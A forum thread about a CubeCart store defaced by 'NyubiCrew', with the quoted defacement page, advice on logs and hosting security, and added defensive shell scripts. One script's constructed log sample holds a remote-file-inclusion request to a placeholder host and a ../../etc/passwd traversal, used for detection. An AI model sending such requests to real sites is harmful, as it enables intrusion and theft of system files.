Cart Hacked


Guest potterygirl

Found this along with an index.html file that stated my site was hacked by this group below.

I am NO longer using Cube Cart as I took the appropriate measures in the documentation to lock down my site.

This all started when I added my site to the "gallery" on the cube cart home page. Just an FYI for those who want to add theirs in the future.


I also wonder what version you were using and if the file and image were the only things they did? If so, it's possible it's all they could do - a lot milder than hacks I've had in the past, mostly of phpnuke rather than cubecart.

I've been listed in the showcase for years and hackers can find you anywhere from any search engine so I wouldn't necessarily say it was from that.


Guest potterygirl

I also wonder what version you were using and if the file and image were the only things they did? If so, it's possible it's all they could do - a lot milder than hacks I've had in the past, mostly of phpnuke rather than cubecart.

I've been listed in the showcase for years and hackers can find you anywhere from any search engine so I wouldn't necessarily say it was from that.

Thank you for replying! Yes it was a mild exploit, I agree. But it still has shaken my trust! I have used CC for a while now, keep it current as far as versions go, and permissions are set appropriately. They also added an html file so that their cronies can see their work.

Do a google of " hacked by nyubicrew" and see how many cube carts have been hacked. I am certain most have no clue they have been hacked.


Guest Dazzle

Ok, that has me more than just a little nervous. I just did the Google search and yes..they have been around...and the first place I saw was a cube cart.. a florist, that appears to have been hacked and I doubt they are even aware of it.

Below is just one area:

About Us

nyubicrew was founded in 2003 in Sofia, Bulgaria.

nyubicrew shop deliver bouquets of fresh flowers, baskets or hampers, floral arrangements, vases or boxes throughout Sofia. We can arrange the delivery of flowers today or tomorrow to anyone in Sofia for any occasion.

We were close to opening our shop and now I am quite scared.


Guest potterygirl

Like I said earlier, I AM RUNNING THE LATEST VERSION OF CUBE CART! ALL PERMISSIONS ARE SET correctly.

None of my other carts that I have on my server that I use to test templates were messed with. The administration wasn't messed with either. NONE of my other files were infiltrated on my server.

I USE A PASSWORD generator that I have on my computer to generate them for myself, and I routinely change them out. I am NOT stupid enough to use my dotcom name for user name and password. My passwords are very strong.

I am VERY certain that all this occurred when I listed my site on the gallery. In 4 years of having an online store, I NEVER NEVER NEVER had any "test" orders or fake orders on my cart.


If you're running the store without a licence, you were probably found from the "powered by cubecart" title; it's probably quicker to search for that in Google than crawl through the gallery.

Ok, so if you are running 3.0.16 or 3.0.17, and on a shared server - check your raw access logs. You may find how they gained access. Typically this could be a strange looking URL to your store.

Even though CC has been security audited, I doubt any mods have been: i.e. they may have entered via a 3rd-party mod, which the base CubeCart code cannot protect against.

Does the server have any brute force detection in place? Is the server up-to-date with patches - and has a decent security system in place?

I'd personally chat to your hosting company, they may be able to investigate for you.

I'm sorry to hear this has happened, and if you find the cause, please contact Devillon with your findings (as opposed to posting here)

Jason


potterygirl, if you haven't read the stickied post -- Anatomy of a Hack. I've not seen any genuine hacks against CubeCart files. I've seen hack files stored in the world-writable directories of CubeCart, but that in no way indicates that they came from a vulnerability in CubeCart.

Check the logs. Have your hosting company check their logs and also any tmp directories for bogus files. I've more than once found attacking files in server tmp folders that then searched for EVERY world-writable directory on the server and loaded malware into them.

Don't shoot the messenger.

:pirate:
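An added example (written for this thread, not code from CubeCart or from the poster) of the check described above: list the world-writable directories under a web root and the script-like files that were recently dropped into them. The web root path is whatever your account uses; the small directory tree built by make_sample_tree is constructed purely to exercise the functions.

```shell
#!/bin/sh
# Added example, not from the thread or from CubeCart: find the places where a
# dropped defacement page can land. The sample tree below is constructed just
# to exercise the functions; point them at your real public_html instead.

# Every directory under $1 that any account on the server can write to.
# (-perm -0002 tests the "other write" bit regardless of the remaining bits.)
world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null | sort
}

# Script-like files under $1 whose contents changed in the last $2 days (default 7).
recent_scripts() {
    days="${2:-7}"
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -mtime "-$days" 2>/dev/null | sort
}

# Recently changed script files sitting directly in a world-writable directory:
# the combination the post describes (hack files parked in writable dirs).
recent_scripts_in_writable_dirs() {
    days="${2:-7}"
    world_writable_dirs "$1" | while IFS= read -r dir; do
        find "$dir" -maxdepth 1 -type f \
            \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) -mtime "-$days"
    done | sort
}

# Constructed fixture: a cart directory with one world-writable image folder
# holding a freshly dropped index.html, next to a normally-permissioned admin dir.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/cc3/images" "$t/cc3/admin"
    chmod 0777 "$t/cc3/images"
    chmod 0755 "$t/cc3/admin"
    printf '<html>defacement page</html>\n' > "$t/cc3/images/index.html"
    printf '<?php /* legitimate admin page */ ?>\n' > "$t/cc3/admin/index.php"
    printf '%s\n' "$t"
}

# Demo run against the constructed tree (replace with your real web root).
tree=$(make_sample_tree)
echo "world-writable directories:"
world_writable_dirs "$tree"
echo "recent script files inside them:"
recent_scripts_in_writable_dirs "$tree" 7
rm -rf "$tree"
```

On a real account run `world_writable_dirs /home/you/public_html` and `recent_scripts /home/you/public_html 3` right after noticing the defacement; anything listed that you did not upload yourself is worth keeping a copy of (for the host to look at) before removing it.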


Semantics of hacking aside for a moment - most hacks require multiple flaws in security to succeed. The most basic defense is a firewall. I'm betting your server has unrestricted outbound access - never a good thing. This allows the server to originate "new calls" to other servers on the 'net (such as making a connection to an IRC channel via port 6667 for example).

Whilst I can understand you getting upset at the fact you were hacked, first, put it into context. Unless you were targeted specifically (and you are likely to know if that was the case), then the hackers are likely just defacers (especially if they did nothing more than say greetz to whoever). It is a notoriety thing, rather than a criminal thing (although breaking into a website and defacing it is a criminal act).

If however, the attack was more subtle, or "silent" (i.e. no obvious site defacement, or attempts to install rootkits/trojans on the server) then the attack is possibly more severe, as the purpose is information theft, leading to fraud/ID theft. To this group of people two things are very bad for them:

* A broken server yields no info for them to steal, and they get noticed, and the server fixed

* If they deface the site, again, they get noticed and the server fixed etc..

Both result in no data for them to exploit, so they want as little notice taking of them as possible, and they want the system to remain functional.

As Sir William above says - trawl your raw server logs (your web server logs are a great place to start) and see what activity has been taking place on the server. Look for patterns. It might have been some time before they actually broke in (if it was serious) or it could be a lucky break by a few script kiddies, which means the attacks would have started around the time they succeeded.

Above all - keep your cool. :) If in doubt, ask your host to re-install the latest version of the operating system, and ensure all servers etc.. are up to date. Get a firewall installed, too (or use IPTables on Linux) to restrict access to the system. Disable remote root access if you don't need it for extra security. Once hackers have root access, they can do what they like.

Best regards,

AstroTux.
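Both Jason's advice (look for strange-looking URLs in the raw access logs) and AstroTux's (look for patterns and for when the activity started) come down to a first pass over the Apache access log. The following is an added example, not from the thread or from CubeCart, of that triage with a few shell functions; the log lines are constructed, and /cc3/, the module name some_mod and all addresses are placeholders.

```shell
#!/bin/sh
# Added example, not from the thread or from CubeCart: first-pass triage of a raw
# Apache access log in combined format. Everything in LOG_SAMPLE is constructed.

# Constructed sample: two ordinary visits on 14 Aug, then on 15 Aug one client
# passing a remote URL into a (hypothetical) module parameter and fetching a
# freshly dropped page, and another client probing the admin folder and trying
# a ../ traversal. The admin probe carries a referer seen in the AWstats list.
LOG_SAMPLE='10.0.0.5 - - [14/Aug/2008:10:01:02 +0000] "GET /cc3/index.php HTTP/1.1" 200 5123 "http://example.net/" "Mozilla/5.0"
10.0.0.5 - - [14/Aug/2008:10:01:09 +0000] "GET /cc3/index.php?act=viewProd&productId=42 HTTP/1.1" 200 7311 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Aug/2008:03:12:40 +0000] "GET /cc3/modules/some_mod/page.php?inc=http://203.0.113.9/x.txt HTTP/1.1" 200 412 "-" "libwww-perl/5.805"
198.51.100.7 - - [15/Aug/2008:03:12:44 +0000] "GET /cc3/images/index.html HTTP/1.1" 200 1498 "-" "libwww-perl/5.805"
203.0.113.22 - - [15/Aug/2008:03:20:11 +0000] "GET /cc3/admin/ HTTP/1.1" 401 512 "http://new.linuxgames.ru/" "Mozilla/4.0"
203.0.113.22 - - [15/Aug/2008:03:20:15 +0000] "GET /cc3/../../etc/passwd HTTP/1.1" 404 280 "-" "Mozilla/4.0"'

# Write the constructed sample to a temp file and print its path.
write_sample_log() {
    f=$(mktemp)
    printf '%s\n' "$LOG_SAMPLE" > "$f"
    printf '%s\n' "$f"
}

# Requests whose request line (2nd "-delimited field) carries a remote URL in a
# parameter, a ../ traversal, or an encoded null byte: the "strange looking URL".
suspicious_requests() {
    awk -F'"' '$2 ~ /=(https?|ftp):\/\/|\.\.\/|%00/' "$1"
}

# Client addresses behind those requests, one per line.
suspicious_clients() {
    suspicious_requests "$1" | awk '{ print $1 }' | sort -u
}

# Everything those clients did, not just the lines that matched: the pivot
# that shows what was fetched after a successful request.
activity_of_suspicious_clients() {
    suspicious_clients "$1" | while IFS= read -r ip; do
        awk -v ip="$ip" '$1 == ip' "$1"
    done
}

# Request count per calendar day, to see when the activity started.
requests_per_day() {
    awk '{ split($4, d, ":"); sub(/^\[/, "", d[1]); c[d[1]]++ }
         END { for (k in c) print c[k], k }' "$1" | sort -k2
}

# Distinct Referer values with counts (the same data AWstats summarises).
referers() {
    awk -F'"' '$4 != "-" { c[$4]++ } END { for (k in c) print c[k], k }' "$1" | sort -rn
}

# Requests per client address, busiest first.
top_clients() {
    awk '{ c[$1]++ } END { for (k in c) print c[k], k }' "$1" | sort -rn
}

# Demo run over the constructed sample (use your real access_log instead).
log=$(write_sample_log)
echo "== requests per day =="; requests_per_day "$log"
echo "== suspicious requests =="; suspicious_requests "$log"
echo "== everything those clients did =="; activity_of_suspicious_clients "$log"
echo "== referers =="; referers "$log"
echo "== busiest clients =="; top_clients "$log"
rm -f "$log"
```

The three patterns in suspicious_requests are a starting point, not a complete signature set; the more useful step is activity_of_suspicious_clients, which shows what a flagged address fetched afterwards (in the sample, the dropped index.html). Rotated logs are usually gzipped, so run the functions on `zcat access_log.*.gz | cat - access_log > all.log` to cover the whole period around the defacement.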


Guest potterygirl

potterygirl, if you haven't read the stickied post -- Anatomy of a Hack. I've not seen any genuine hacks against CubeCart files. I've seen hack files stored in the world-writable directories of CubeCart, but that in no way indicates that they came from a vulnerability in CubeCart.

Check the logs. Have your hosting company check their logs and also any tmp directories for bogus files. I've more than once found attacking files in server tmp folders that then searched for EVERY world-writable directory on the server and loaded malware into them.

Don't shoot the messenger.

:)

LOL at the "don't shoot the messenger"... are you kidding? You guys always have the answers....

Yep I read the pinned FAQ (a while back prior to finding all this) on "anatomy of a hack" etc. And yes as I posted after my initial post, that it was more of an exploit than a hack. And yes I totally agree that the whole thing is more of a "hey, look what I can do" exploit to the other stupid hackers in the world.

Thanks for letting me vent and also sharing your insights on the matter. I am going to check my other logs and see about who/when the accessing might have occurred. I DID pin it down to when it was posted....which correlates along with the gallery posting (I posted here asking if others had a terrible time with fake orders from being in the gallery!)...the timing is within the same time frame.

It's just soooooo irritating and feels like someone has been in and burglarized one's home or something....


Guest potterygirl

Okay, perusing through some files and logs...in my AWstats there are numerous weird links that reference to my site from other sites ("Links from an external page (other web sites except search engines)").

When you click on them, (for example...to go to the site http://new.linuxgames.ru/) it tries to access my site (I password-protected my Cube Cart file), and the logon credentials pop-up window shows up trying to access my Cube Cart files...

Here's the AW stats results...each one when I click on them tries to link back to my CC files...:

- http://new.linuxgames.ru 0 2

- http://www.autoscan.com.ua/index.php 0 3

- http://autoscan.com.ua/administrator/ 0 5

- http://1958auction.com 0 2

- http://castle.suiteone.com/~adomaha/ 0 7

- http://c3motorsport.com 0 12

- http://hqformod.com/index.php 0 2

- http://www.frozenmidnightsupport.com 0 4

- http://www.rpl-smkn1dps.net/cache/ 0 8

- http://frozenmidnightsupport.com 0 7

- http://tahiti.org 0 18

- http://www.autoscan.com.ua/administrator/ 0 2

- Others

So what does this all mean?


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>--=[Indonesia Hacker]=--</title>

<style type="text/css">

<!--

body,td,th {

	color: #00FF00;

	font-family: Verdana, Arial, Helvetica, sans-serif;

}

body {

	background-color: #000000;

}

.style1 {color: #FF0000}

.style2 {color: #FFFFFF}

-->

</style></head>



<body>

<br />

<br />

<div align="center">&lt;==[ Hacked By NyubiCrew]==&gt; <br />

  <table width="100">



	<tr>

	  <td><img src="http://www.clayandsoapstudio.com/cc3/solpot.jpg" width="282" height="284" /></td>

	</tr>

  </table>

	<span class="style1"><br />

	HUT</span> <span class="style2">RI</span> 17-Agustus-1945 <br />



	MerDeka !!!<br />

	<span class="style1">Indo</span><span class="style2">nesia</span><br />

	<br />

</div>

</body>

</html>


That is what is in the page when I attempt to view it.




http://www.clayandsoapstudio.com/cc3/solpot.jpg

^^^ Is that your site???

When I attempt to view that site, it asks for login. Clicking Cancel gives me a 401 error (both for the file, the cc3 directory and the root docs folder).

What is solpot.jpg??

Best regards,

AstroTux.


List of IPs associated with each domain name listed above:

193.178.145.191
~~~~~~~~~~~~~~~
autoscan.com.ua
www.autoscan.com.ua

206.221.179.190
~~~~~~~~~~~~~~~
1958auction.com
c3motorsport.com

69.16.208.191
~~~~~~~~~~~~~
castle.suiteone.com

62.118.250.230
~~~~~~~~~~~~~~
new.linuxgames.ru

hgformod.com - Unable to resolve target host

208.101.25.232
~~~~~~~~~~~~~~
www.frozenmidnightsupport.com
frozenmidnightsupport.com

70.84.54.58
~~~~~~~~~~~
www.rpl-smkn1dps.net

67.19.167.130
~~~~~~~~~~~~~
tahiti.org

Best regards,

AstroTux.


Guest potterygirl

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<title>--=[Indonesia Hacker]=--</title>

<style type="text/css">

<!--

body,td,th {

	color: #00FF00;

	font-family: Verdana, Arial, Helvetica, sans-serif;

}

body {

	background-color: #000000;

}

.style1 {color: #FF0000}

.style2 {color: #FFFFFF}

-->

</style></head>



<body>

<br />

<br />

<div align="center">&lt;==[ Hacked By NyubiCrew]==&gt; <br />

  <table width="100">



	<tr>

	  <td><img src="http://www.clayandsoapstudio.com/cc3/solpot.jpg" width="282" height="284" /></td>

	</tr>

  </table>

	<span class="style1"><br />

	HUT</span> <span class="style2">RI</span> 17-Agustus-1945 <br />



	MerDeka !!!<br />

	<span class="style1">Indo</span><span class="style2">nesia</span><br />

	<br />

</div>

</body>

</html>


That is what is in the page when I attempt to view it.




http://www.clayandsoapstudio.com/cc3/solpot.jpg


^^^ Is that your site???



When I attempt to view that site, it asks for login. Clicking Cancel gives me a 401 error (both for the file, the cc3 directory and the root docs folder).



What is solpot.jpg??



Best regards,

AstroTux.
yes my site was clayandsoapstudio.com. I have no clue about the solpot either. That is the image they deposited on my site.

I locked down the cube cart folder once I found these redirects back to my cart file.


Hi,

That does look suspicious (I know that is stating the obvious), but for all the different sites to point back at yours - maybe it is a way of them advertising that they've hacked your site specifically??

Move your cart directory from domain/cc3 to something else. Put a server authentication requirement on the admin folder at least, and if using MySQL for the data files, look at using file encryption for the actual files themselves. That will take a little setting up in order to allow the MySQL service to read the encrypted files, but that way, if they do end up getting root access for whatever reason (at that point it's too late for your server) then at least the sensitive customer files can't be accessed. Don't forget that you have a legal obligation here to ensure that all customer data is kept confidential. I'd argue in any court that use of file encryption is the best you can do, and if that gets broken - well - you tried. Anything that is online is a risk - you just have to take reasonable steps to keep it as secure as possible.

You did the right thing restricting the site until this is resolved, but obviously your business can't continue that way. :)

If your host seems difficult or refuses to install some serious security for your server without additional cost - find another host. Some places don't take security seriously and expect you to have all the answers. Some places say "you supply the hardware and we'll install it" but that is additional expense for yourself and should be standard IMHO. The way I see it is that they are their servers - they have the responsibility to YOU to ensure they don't get hacked (within reasonable limits - nothing is 100% secure except for the machine and data that don't exist).

Send a letter/email to your host, and if they don't play ball - find one who will.

Best regards,

AstroTux.
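Of the steps above, the "server authentication requirement on the admin folder" is the one that can be done in minutes on any Apache host. Here is an added example (written for this thread, not CubeCart's own code or configuration) that writes such an .htaccess and manages the matching .htpasswd file; the admin directory and password-file locations are assumptions to adapt to your renamed cart folder.

```shell
#!/bin/sh
# Added example, not from the thread or from CubeCart: HTTP basic authentication
# in front of the cart's admin directory, plus a deny rule for files that should
# never be served from it. The paths passed in are assumptions for your setup.

# Write an .htaccess into admin dir $1 that requires a valid user from password file $2.
# Keep $2 OUTSIDE the web root (e.g. /home/you/.htpasswd, not /home/you/public_html).
write_admin_htaccess() {
    admin_dir="$1"; passwd_file="$2"
    cat > "$admin_dir/.htaccess" <<EOF
# Server-level login required before the application's own admin login is reached
AuthType Basic
AuthName "Store administration"
AuthUserFile $passwd_file
Require valid-user

# Never serve password files or backup/editor copies, even if one lands in here
<FilesMatch "^(\.htpasswd|\.htaccess|.*\.(bak|sql|old|orig))\$">
    Require all denied
</FilesMatch>
EOF
}

# Add or replace user $2 with password $3 in htpasswd file $1, hashed with Apache's
# MD5 scheme via openssl (equivalent to: htpasswd -B "$1" "$2" from apache2-utils).
add_htpasswd_user() {
    passwd_file="$1"; user="$2"; password="$3"
    hash=$(printf '%s' "$password" | openssl passwd -apr1 -stdin) || return 1
    touch "$passwd_file"
    grep -v "^$user:" "$passwd_file" > "$passwd_file.tmp" || true   # drop old entry
    printf '%s:%s\n' "$user" "$hash" >> "$passwd_file.tmp"
    mv "$passwd_file.tmp" "$passwd_file"
    chmod 640 "$passwd_file"   # readable by owner and the web server's group only
}

# Demo against a constructed directory (replace with your real cart/admin path).
d=$(mktemp -d)
mkdir "$d/admin"
write_admin_htaccess "$d/admin" "$d/.htpasswd"
if command -v openssl >/dev/null 2>&1; then
    add_htpasswd_user "$d/.htpasswd" shopadmin 'use-a-generated-password-here'
fi
cat "$d/admin/.htaccess"
rm -rf "$d"
```

The `Require all denied` line is Apache 2.4 syntax; on the Apache 2.2 servers common when this thread was written, use `Order allow,deny` followed by `Deny from all` inside the FilesMatch block instead. After uploading, confirm with `curl -I http://yoursite/yourcart/admin/` that an anonymous request gets a 401 and nothing else; the .htaccess only takes effect if the host allows `AllowOverride AuthConfig` for your directory.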


Guest potterygirl

Hi,

That does look suspicious (I know that is stating the obvious), but for all the different sites to point back at yours - maybe it is a way of them advertising that they've hacked your site specifically??

Move your cart directory from domain/cc3 to something else. Put a server authentication requirement on the admin folder at least, and if using MySQL for the data files, look at using file encryption for the actual files themselves. That will take a little setting up in order to allow the MySQL service to read the encrypted files, but that way, if they do end up getting root access for whatever reason (at that point it's too late for your server) then at least the sensitive customer files can't be accessed. Don't forget that you have a legal obligation here to ensure that all customer data is kept confidential. I'd argue in any court that use of file encryption is the best you can do, and if that gets broken - well - you tried. Anything that is online is a risk - you just have to take reasonable steps to keep it secure.

You did the right thing restricting the site until this is resolved, but obviously your business can't continue that way. :)

If your host seems difficult or refuses to install some serious security for your server without additional cost - find another host. Some places don't take security seriously and expect you to have all the answers. Some places say "you supply the hardware and we'll install it" but that is additional expense for yourself and should be standard IMHO. The way I see it is that they are their servers - they have the responsibility to YOU to ensure they don't get hacked (within reasonable limits - nothing is 100% secure except for the machine and data that don't exist).

Send a letter/email to your host, and if they don't play ball - find one who will.

Best regards,

AstroTux.

Thank you Astro! I am moving things over today to a new cart. I was in line to revamp my cart anyway, so here's to Visine for the a.m.! Yep, all that fancy coding I did to the skins to make it look so Vogue! ROTFLMAO....I guess the Indonesians thought I looked like bath and body works! HAHAHAHAHAHA! Yeah right! Geez!

Thanks to all who posted. I removed the files from my cart so maybe those links won't work correctly anymore. I am sure the owners of those other sites are wondering what's going on too??? If those are real sites that is.
